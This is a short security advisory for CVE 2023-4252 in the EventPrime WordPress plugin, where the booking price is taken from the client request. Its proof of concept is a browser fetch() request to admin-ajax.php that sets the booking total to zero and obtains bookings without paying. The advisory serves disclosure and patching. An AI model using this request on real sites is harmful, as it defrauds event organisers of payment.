EventPrime < 3.3.6 – Booking Pricing Bypass | CVE 2023-4252

Description

The plugin specifies the price of a booking in the client request, allowing an attacker to purchase bookings without payment.

Proof of Concept

Create an Event, noting its ID. Add a ticket type to the Event, ensuring that the price is not zero.

As a logged-in user, go through the process of paying for an event booking until the "Select Payment Method" page. Then run the following code in the browser (replacing EVENT_ID) and note that a booking has been created without payment.

await (await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": "action=ep_save_event_booking&data=ep_event_booking_event_id%3DEVENT_ID%26ep_event_booking_user_id%3D1%26ep_event_booking_total_price%3D0%26ep_event_booking_total_tickets%3D1%26ep_save_event_booking_nonce%3D" + document.querySelector("[name=ep_save_event_booking_nonce]").value ,
    "method": "POST",
})).text();